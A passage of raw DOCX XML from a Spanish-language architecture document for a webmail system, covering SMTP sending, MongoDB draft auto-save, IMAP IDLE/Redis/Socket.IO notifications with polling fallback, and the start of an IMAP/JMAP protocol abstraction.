        <w:t xml:space="preserve">4.2.5 Envío: Draft → Firma → SMTP → Copia en Sent → Borra Draft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El pipeline de envío de email asegura que ningún mensaje se pierda incluso ante fallos parciales:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Composición y auto-save</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Mientras el usuario redacta, el frontend envía peticiones PATCH cada 10 segundos para actualizar el draft en MongoDB. Los drafts se almacenan en la colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">drafts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sin sincronización con el servidor IMAP hasta que el usuario envía.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Preparación del mensaje</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Al pulsar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Enviar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, el backend construye el mensaje MIME completo usando Nodemailer, incluyendo: headers In-Reply-To y References para mantener el thread (siguiendo el algoritmo JWZ)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[56]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, firma HTML configurada por el usuario, y adjuntos referenciados por storageKey en SeaweedFS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Envío SMTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Nodemailer transmite el mensaje vía SMTP con STARTTLS y pooling de conexiones para mejor performance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[68]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Para cuentas Gmail, se requiere autenticación OAuth2 (XOAUTH2) ya que Google eliminó completamente la autenticación básica en marzo de 2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[58]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Copia en Sent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Tras confirmación de envío SMTP, se crea una copia en la carpeta Sent vía IMAP APPEND. EmailEngine demuestra que este patrón es robusto, construyendo automáticamente los headers necesarios y marcando flags IMAP apropiados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[60]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Limpieza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Se elimina el draft de MongoDB y se encola un job para sincronizar la carpeta Sent, asegurando que la copia aparezca en el inbox del usuario.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:id="69" w:name="auto-save-draft-mongodb-cada-10-segundos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.6 Auto-Save Draft: MongoDB cada 10 segundos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El auto-guardado de borradores es una operación crítica para la experiencia de usuario que debe ser rápida y fiable:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Frecuencia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El frontend envía el estado completo del draft (to, cc, bcc, subject, body, attachments) cada 10 segundos mientras el usuario está activo en el compositor, y al detectar el evento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">beforeunload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Storage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Los drafts se almacenan exclusivamente en MongoDB (colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">drafts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) sin sincronización con el servidor IMAP. Esto evita crear mensajes de borrador temporales en la bandeja del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Concurrencia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Al abrir el compositor, se carga el draft más reciente desde MongoDB. Si existen múltiples borradores para una misma cuenta, se presentan en un selector lateral.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cleanup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Los drafts no modificados en 30 días se eliminan automáticamente mediante un índice TTL en MongoDB sobre el campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lastModifiedAt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="73" w:name="notificaciones-en-tiempo-real"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Notificaciones en Tiempo Real</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El sistema implementa un pipeline de notificaciones push dual: WebSocket como canal principal con IMAP IDLE como fuente de eventos, complementado por polling periódico como fallback para servidores sin soporte IDLE.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="71" w:name="Xd7639d65ddc6b571bb8a101232c6ffc9a01de55"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.1 IMAP IDLE → Redis Pub/Sub → WebSocket → Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La arquitectura de notificaciones en tiempo real consta de cuatro capas conectadas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IMAP IDLE (capa de protocolo)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Para cada cuenta conectada, imapflow mantiene una conexión IDLE activa en el folder INBOX. IMAP IDLE (RFC 2177) permite al servidor IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">empujar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">notificaciones al cliente cuando llegan nuevos mensajes, eliminando la necesidad de polling constante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[63]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Si el servidor no soporta IDLE, imapflow permite configurar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">missingIdleCommand</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con alternativas como NOOP, SELECT o STATUS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[41]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La limitación de IDLE — solo una carpeta por conexión — se mitiga reiniciando IDLE periódicamente según</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxIdleTime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y rotando entre carpetas monitoreadas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Redis Pub/Sub (capa de mensajería)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Cuando imapflow recibe una notificación de nuevo mensaje (o cambio de flags), el IMAP Manager publica un evento estructurado al canal Redis</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">notifications:{userId}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Redis Pub/Sub distribuye el evento a todos los servidores WebSocket suscritos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[138]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aunque Pub/Sub es fire-and-forget (mensajes se evaporan si no hay suscriptores activos), esto es adecuado para notificaciones de email donde el objetivo es informar a sesiones activas, no persistir eventos históricos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[142]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Para eventos críticos que no pueden perderse (como la llegada de un email que dispara una regla de forwarding), se utiliza Redis Streams con acknowledgment y replay</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[142]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Socket.IO Server (capa de transporte)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El servidor WebSocket se suscribe a los canales Redis de los usuarios con sesiones activas. Cuando recibe un evento, lo transmite a la room Socket.IO correspondiente al</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">userId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Socket.IO se selecciona sobre</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ws</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nativo por su soporte de rooms (permitiendo notificaciones por usuario), auto-reconexión con backoff exponencial, y fallback transparente a HTTP long-polling cuando WebSocket no está disponible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[162]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aunque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ws</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ofrece mayor rendimiento crudo (~45,493 msg/s vs ~27,152 msg/s de Socket.IO), las features adicionales de Socket.IO resultan críticas para la fiabilidad del canal de notificaciones en condiciones de red variables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[155]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Frontend (capa de consumo)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El cliente Vue recibe eventos como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">email:new</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">email:flagChanged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">folder:countChanged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y actualiza el store Pinia correspondiente, reflejando los cambios en la UI sin necesidad de refresh. Los eventos de nuevo email desencadenan además una petición de sincronización incremental para obtener los headers del mensaje nuevo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkStart w:id="72" w:name="fallback-polling-30-60s"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.2 Fallback Polling 30-60s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para escenarios donde WebSocket no está disponible (redes corporativas con proxies que bloquean ws://, dispositivos móviles en modo de ahorro de datos) o el servidor IMAP no soporta IDLE, el sistema implementa polling inteligente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Intervalo adaptativo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El frontend alterna entre intervalos de 30 segundos (cuando la pestaña está activa y visible) y 60 segundos (cuando está en background), reduciendo la carga del servidor y el consumo de batería en dispositivos móviles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Polling eficiente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: En lugar de descargar headers completos, el polling usa el comando IMAP STATUS para comparar el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UIDNEXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">UNSEEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de cada folder con los valores cacheados. Solo si hay diferencias se ejecuta una sincronización incremental real.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Transición transparente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El frontend detecta automáticamente la disponibilidad de WebSocket y transita entre el modo push (WebSocket) y el modo pull (polling) sin intervención del usuario. El evento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect_error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de Socket.IO desencadena la activación del polling; el evento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lo desactiva.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="579"/>
        <w:gridCol w:w="2414"/>
        <w:gridCol w:w="2607"/>
        <w:gridCol w:w="2318"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Latencia de notificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Uso de batería/rendimiento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Condición de activación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WebSocket push (Socket.IO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 1 segundo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bajo (conexión persistente)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WebSocket disponible, IMAP IDLE soportado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Polling adaptativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">30-60 segundos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Moderado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WebSocket bloqueado o IDLE no soportado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Polling de emergencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">120 segundos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mínimo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pestaña en background, modo ahorro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:id="77" w:name="abstracción-de-protocolo-imap-jmap"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Abstracción de Protocolo: IMAP + JMAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una decisión arquitectónica distintiva de Webmail 6.0 es la implementación de una capa de abstracción de protocolo que permite operar indistintamente sobre IMAP tradicional o JMAP (JSON Meta Application Protocol), seleccionando automáticamente el protocolo óptimo según las capacidades del servidor.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="74" w:name="capa-de-abstracción-unificada"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4.1 Capa de Abstracción Unificada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El Protocol Manager expone una interfaz TypeScript uniforme independientemente del protocolo subyacente:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> IEmailProtocol {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ProtocolConfig)</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Connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
